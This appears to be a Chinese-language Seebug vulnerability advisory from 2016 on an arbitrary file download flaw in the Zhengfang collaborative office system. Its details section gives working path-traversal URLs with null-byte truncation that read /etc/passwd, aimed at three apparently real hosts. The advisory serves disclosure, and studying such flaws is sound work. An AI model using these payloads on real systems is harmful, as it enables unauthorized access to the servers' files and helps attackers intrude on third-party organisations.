正方协同办公系统/zfoa/gwxxbviewhtml.do任意文件下载漏洞

2016-01-20T00:00:00
ID SSV:90531
Type seebug
Reporter hhxx
Modified 2016-01-20T00:00:00

Description

0x01 系统介绍

正方协同办公系统的设计目标是帮助各部门快速构建起一个安全、可靠、易用的文档一体化办公环境,实现公文处理的自动化,同时作为内部通讯和信息共享的平台。

系统的特点如下:

(1)简单易用:实现快速部署,轻松办公   符合日常办公习惯的界面和操作,通过简单的使用培训,使用人员即可了解系统中的相关办公设置,并可应用系统进行办公。    (2)灵活的自定义功能,满足个性与变化的需求   组织机构、表单格式、工作流程、访问权限、打印格式、统计等全面提供自定义,能够很好的满足各单位现在和未来的办公自动化需求。    (3)多层次的安全设计,为办公自动化提供保障   系统提供了用户名+密码的身份认证、数据库安全性、表单安全性、文档安全性等多层次的安全设计,确保办公自动化系统的安全运行。    (4)稳定可靠   经过大量的功能测试和压力测试,具有很好的稳定性、可靠性。    (5)符合相关规范和标准   完全符合《中国共产党机关公文处理条例》、《国家行政机关公文处理办法》、《国家行政机关公文格式》、《中华人民共和国档案法》、《归档文件整理规则》等规范,对各种办公要素均提供有效的支持。    官方主页:www.zfsoft.com

![](https://images.seebug.org/contribute/dfe4dca3-5682-4cec-a6bf-0c9b792e9493-2016-01-13 12_34_06.jpg)

0x02 漏洞细节

经过url解码构造,发现只要截断就可以下载任意文件:

案例: code 区域

http://202.207.177.104:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00

http://info.lajy.com:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00

http://oa.xzcit.cn/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00

![](https://images.seebug.org/contribute/8b460451-6c98-4770-bb8c-753399a4beb2-2016-01-13 12_37_38.jpg)

Pocsuite证明:

![](https://images.seebug.org/contribute/1fd3d7d7-cd5a-403c-b99f-127693297b82-2016-01-13 12_48_15.jpg)

0x03 参考链接

http://www.wooyun.org/bugs/wooyun-2015-0150337